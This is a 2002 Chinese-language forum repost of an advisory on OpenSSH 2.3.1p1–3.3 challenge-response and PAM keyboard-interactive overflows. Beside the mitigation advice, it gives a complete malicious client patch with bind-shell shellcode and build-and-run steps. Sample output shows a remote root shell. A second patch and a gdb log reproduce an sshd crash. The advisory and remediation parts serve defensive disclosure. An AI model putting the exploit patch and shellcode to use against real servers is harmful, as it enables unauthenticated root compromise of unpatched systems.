作者 主題: OpenSSH缺陷允許攻擊者遠程利用/非法執行任意代碼  (閱讀 4964 次)

0 會員 與 1 訪客 正在閱讀本文。

protech

  • 活潑的大學生
  • ***
  • 文章數: 322
  • 性別: 男
    • 檢視個人資料
涉及程序:
OpenSSH versions 2.3.1p1 ~ 3.3
 
描述:
OpenSSH缺陷允許攻擊者遠程利用/非法執行任意代碼(更新)
 
詳細:
在OpenSSH 2.3.1p1到3.3版本中,關挑戰反應處理代碼存在安全性缺陷。允許遠程入侵者以sshd(通常是root)進程的身份執行任意指令。
第一個缺陷是因為在挑戰反應認証過程中,OpenSSH在處理關收到的響應次數的變量上存在整型溢出風險,如果挑戰反應設置為打開,並且系統使用SKEY或者BSD_AUTH認証選項,則允許攻擊者利用此缺陷遠程執行任意指令。這個漏洞已經被証實。
第二個缺陷牽涉到使用交互式鍵盤認証的PAM模塊, OpenSSH 2.3.1p1~3.3版本。OpenSSH在處理關收到的響應次數的變量上存在緩沖溢出風險,不論挑戰反應設置如何,系統使用交互式鍵盤認証的PAM模塊(PAMAuthenticationViaKbdInt),可能會導致允許遠程非法執行指令的風險。目前尚未有代碼証實是否能達到攻擊效果。
對這兩個缺陷的攻擊,都建立在使用SSH ver2的版本特征上。
多個Linux/Unix平台受該漏洞影響。
多個Linux組織和廠商為此發布安全公告。
 
攻擊方法:

1. 下載 openssh-3.2.2p1.tar.gz 並解壓

~ $ tar -xvzf openssh-3.2.2p1.tar.gz

2. 執行提供的補丁: (將下方紅色字體段落存為補丁文件)

~/openssh-3.2.2p1 $ patch < path_to_diff_file

3. 編譯已經打過補丁的OpenSSH客戶端:

~/openssh-3.2.2p1 $ ./configure && make ssh

4. 運行ssh:

~/openssh-3.2.2p1 $ ./ssh root:skey@localhost

5. 如果成功,則可連接128端口

~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)

(除此之外,bugtraq.org提供了一個打過補丁的SSH攻擊客戶端:sshutup-theo.tar.gz)


--- sshconnect2.c Sun Mar 31 20:49:39 2002
+++ evil-sshconnect2.c Fri Jun 28 19:22:12 2002
@@ -839,6 +839,56 @@
/*
* parse INFO_REQUEST, prompt user and send INFO_RESPONSE
*/
+
+int do_syscall( int nb_args, int syscall_num, ... );
+
+void shellcode( void )
+{
+ int server_sock, client_sock, len;
+ struct sockaddr_in server_addr;
+ char rootshell[12], *argv[2], *envp[1];
+
+ server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );
+ server_addr.sin_addr.s_addr = 0;
+ server_addr.sin_port = 32768;
+ server_addr.sin_family = AF_INET;
+ do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr,
16 );
+ do_syscall( 2, 106, server_sock, 1 );
+ client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
+ &server_addr, &len );
+ do_syscall( 2, 90, client_sock, 0 );
+ do_syscall( 2, 90, client_sock, 1 );
+ do_syscall( 2, 90, client_sock, 2 );
+ * (int *) ( rootshell + 0 ) = 0x6E69622F;
+ * (int *) ( rootshell + 4 ) = 0x0068732f;
+ * (int *) ( rootshell + 8 ) = 0;
+ argv[0] = rootshell;
+ argv[1] = 0;
+ envp[0] = 0;
+ do_syscall( 3, 59, rootshell, argv, envp );
+}
+
+int do_syscall( int nb_args, int syscall_num, ... )
+{
+ int ret;
+ asm(
+ "mov 8(%ebp), %eax; "
+ "add $3,%eax; "
+ "shl $2,%eax; "
+ "add %ebp,%eax; "
+ "mov 8(%ebp), %ecx; "
+ "push_args: "
+ "push (%eax); "
+ "sub $4, %eax; "
+ "loop push_args; "
+ "mov 12(%ebp), %eax; "
+ "push $0; "
+ "int $0x80; "
+ "mov %eax,-4(%ebp)"
+ );
+ return( ret );
+}
+
void
input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
{
@@ -865,7 +915,7 @@
xfree(inst);
xfree(lang);

- num_prompts = packet_get_int();
+ num_prompts = 1073741824 + 1024;
/*
* Begin to build info response packet based on prompts requested.
* We commit to providing the correct number of responses, so if
@@ -874,6 +924,13 @@
*/
packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);
packet_put_int(num_prompts);
+
+ for( i = 0; i < 1045; i++ )
+ packet_put_cstring( "xxxxxxxxxx" );
+
+ packet_put_string( shellcode, 2047 );
+ packet_send();
+ return;

debug2("input_userauth_info_req: num_prompts %d", num_prompts);
for (i = 0; i < num_prompts; i++) {

 
 
解決方案:
將OpenSSH升級到3.4版本。
http://www.openssh.com/txt/preauth.adv
禁止 SSH 協議 ver 2
在 /etc/ssh/sshd_config: 增加下面這行:
Protocol 1

禁止挑戰反應認証
對OpenSSH 2.9以上版本,管理員可以禁止挑戰反應認証選項:
在 /etc/ssh/sshd_config 增加一行:

ChallengeResponseAuthentication no
默認情況下是設置為 yes

禁止PAM模塊:
/etc/ssh/sshd_config:
PAMAuthenticationViaKbdInt no

老版本下禁止兩個選項(2.3.1p1 and 2.9)
KbdInteractiveAuthentication no
ChallengeResponseAuthentication no

使用權限限制最小化影響:
/etc/ssh/sshd_config:
UsePrivilegeSeparation yes

多個Unix平台受此漏洞影響,已經有多個Unix vendor發布安全公告:
Debian Security Advisory DSA-134-4
NetBSD Security Advisory SA2002-005
OpenPKG Security Advisory
SuSE Security Announcement
Trustix Secure Linux


 
 
附加信息:
How to reproduce OpenSSH Overflow.

The R7 team did a little investigating into one of the OpenSSH
vulnerabilities.

The following are instructions on how to reproduce a segmentation
violation in sshd (v3.2.3p1):

0.) Compile with PAM and S/KEY support.

1.) Apply the following patch to the ssh client:

- --- sshconnect2.c.bak Thu Jun 27 11:54:54 2002
+++ sshconnect2.c Thu Jun 27 11:56:27 2002
@@ -866,6 +866,7 @@
xfree(lang);

num_prompts = packet_get_int();
+ num_prompts = 2;
/*
* Begin to build info response packet based on prompts requested.
* We commit to providing the correct number of responses, so if
@@ -877,15 +878,16 @@

debug2("input_userauth_info_req: num_prompts %d", num_prompts);
for (i = 0; i < num_prompts; i++) {
+ if ( i == 0 ) {
prompt = packet_get_string(NULL);
echo = packet_get_char();

response = read_passphrase(prompt, echo ? RP_ECHO : 0);
- -
+ }
packet_put_cstring(response);
- - memset(response, 0, strlen(response));
+ /*memset(response, 0, strlen(response));
xfree(response);
- - xfree(prompt);
+ xfree(prompt);*/
}
packet_check_eom(); /* done with parsing incoming message. */



2.) Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.

3.) Connect to sshd using the modified client.
Note: valid credentials are not required.


On the server side, you'll see:

[root@wonderland hi_chad]# gdb /usr/sbin/sshd
GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run -d
Starting program: /usr/sbin/sshd -d
debug1: sshd version OpenSSH_3.2.3p1
debug1: private host key: #0 type 0 RSA1
debug1: read PEM private key done: type RSA
debug1: private host key: #1 type 1 RSA
debug1: read PEM private key done: type DSA
debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol
debug1: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
Generating 768 bit RSA key.
RSA key generation complete.
debug1: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 33208
debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1
debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1
debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
debug1: dh_gen_key: priv key bits set: 124/256
debug1: bits set: 1626/3191
debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
debug1: bits set: 1597/3191
debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user jdog service ssh-connection method none
debug1: attempt 0 failures 0
debug1: Starting up PAM with username "jdog"
debug1: PAM setting rhost to "localhost.localdomain"
Failed none for jdog from 127.0.0.1 port 33208 ssh2
debug1: userauth-request for user jdog service ssh-connection method
keyboard-interactive
debug1: attempt 1 failures 1
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=jdog devs=
debug1: kbdint_alloc: devices 'skey'
debug1: auth2_challenge_start: trying authentication method 'skey'
debug1: got 2 responses
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08053822 in strcpy ()
(gdb)


Comments are much appreciated.

- Joe
 
本文出自:http://www.cnns.net 作者: (2002-07-05 06:02:00)